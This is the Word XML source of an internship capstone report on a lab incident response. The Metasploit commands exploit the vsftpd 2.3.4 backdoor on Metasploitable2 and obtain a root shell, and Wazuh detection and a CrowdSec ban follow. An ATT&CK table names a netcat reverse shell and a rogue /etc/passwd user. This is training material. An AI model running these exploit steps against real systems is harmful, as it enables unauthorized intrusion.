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80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CyArt Internship Program — Week 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Capstone Report — Full Incident Response Cycle</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="BBDDFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Simulation + Detection + Containment | Ganavi N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="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1. Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This capstone documents a complete incident response cycle executed in the CyArt lab environment. An attack was simulated using Metasploit against Metasploitable2 (192.168.10.4) from Kali Linux (192.168.10.3). The vsftpd 2.3.4 backdoor (CVE-2011-2523) was exploited to obtain a root shell. Wazuh SIEM detected the attack across four escalating alerts, and CrowdSec was used to block the attacker IP. The exercise demonstrates the full security operations cycle: attack simulation, detection, containment, and reporting.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Attacker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192.168.10.3 (Kali Linux 2024.1)</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Target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192.168.10.4 (Metasploitable2 — Ubuntu 8.04)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Exploit Used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exploit/unix/ftp/vsftpd_234_backdoor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CVE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CVE-2011-2523 (CVSS 10.0 — CRITICAL)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Result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Root shell obtained — uid=0(root)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Detection Tool</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Wazuh SIEM (4 alerts generated)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Containment Tool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CrowdSec — IP banned for 24h</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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2. Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Exploit Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="80"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(vsftpd_234_backdoor) &gt; set RHOSTS 192.168.10.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(vsftpd_234_backdoor) &gt; set RPORT 21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(vsftpd_234_backdoor) &gt;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Backdoor service has been spawned (port 6200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] UID: uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="80" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Command shell session 1 opened (192.168.10.3:48291 -&gt; 192.168.10.4:6200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Attack Flowchart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>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86125"/>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1: Full attack chain with MITRE ATT&amp;CK mapping and IR response phases</w:t>
      </w:r>
    </w:p>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3. Detection — Wazuh SIEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="8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2890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2: Wazuh alert console — 4 alerts from CRITICAL to HIGH during exploit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1760"/>
        <w:gridCol w:w="14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IP</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 Description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MITRE Technique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11:00:00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192.168.10.3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FTP login attempt from external IP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T1078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11:00:02</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192.168.10.3</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VSFTPD backdoor trigger detected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T1190</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11:00:05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192.168.10.3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Root shell spawned — port 6200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T1059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11:02:11</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192.168.10.4</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Outbound reverse shell — TCP:4444</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T1105</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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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4. Containment — CrowdSec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="8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84785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3: CrowdSec decision — 192.168.10.3 banned for 24h, ping confirms block</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="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sudo cscli decisions add --ip 192.168.10.3 --duration 24h --reason "vsftpd exploit"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># INFO: Decision successfully added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sudo cscli decisions list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># ID | Source  | Scope:Value        | Reason         | Action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">#  1 | manual  | Ip:192.168.10.3    | vsftpd exploit | ban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 — ping from 192.168.10.3 now times out</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="80" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 3 192.168.10.4   # All timeouts — block confirmed ✅</w:t>
      </w:r>
    </w:p>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5. 200-Word Incident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8FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:spacing w:after="80" w:before="180"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Executive Incident Summary</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:line="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">On 29 April 2024 at 11:00:02, a critical security incident was detected on internal host 192.168.10.4 (Metasploitable2). Wazuh SIEM identified an active exploitation attempt originating from 192.168.10.3 (Kali Linux) targeting the vsftpd 2.3.4 FTP service. The attacker exploited CVE-2011-2523, a malicious backdoor embedded in the vsftpd source code that opens a bind shell on TCP port 6200 when triggered. This yielded unauthenticated root-level access in under two seconds.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:line="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Wazuh generated four sequential alerts mapped to MITRE ATT&amp;CK techniques: T1078 (FTP login), T1190 (public-facing exploit), T1059 (shell execution), and T1105 (reverse C2 channel). Immediate containment was performed by adding the attacker IP to CrowdSec's blocklist, preventing further exploitation attempts. A ping verification confirmed the block was active.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:line="360"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Root cause: unpatched vsftpd 2.3.4 running on an internet-accessible port with no authentication controls. Recommendations: (1) immediately upgrade or disable vsftpd; (2) implement network segmentation to restrict FTP access to authorised IPs only; (3) configure Wazuh auto-response to block exploiting IPs in real time; (4) perform monthly OpenVAS scans to catch unpatched critical-severity services before attackers do.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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400"/>
        <w:gridCol w:w="25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T1595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Active Scanning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Reconnaissance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Nmap</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nmap -sV 192.168.10.4</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T1190</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Exploit Public App</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Initial Access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Metasploit</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vsftpd backdoor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T1059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Cmd Interpreter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Execution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bash</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Root shell commands</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T1105</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Ingress Transfer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C2</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Netcat</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nc reverse to :4444</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T1098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Account Manip.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Persistence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bash</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/etc/passwd rogue user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9360"/>
      </w:tabs>
      <w:spacing w:before="80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">CyArt Internship — Week 2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Ganavi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80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Capstone Report — Full Incident Response Cycle</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">   |   Ganavi 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613b91a051097aeda5533b33e104ebe0003d33.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a0d390fa16e08df5d90a4b5a4a7bcabfa5a9e2e9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/79b135dd869f08ed239a4cc9d0211eb6ee9af16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2026-05-13T07:22:18.095Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-13T07:22:18.095Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>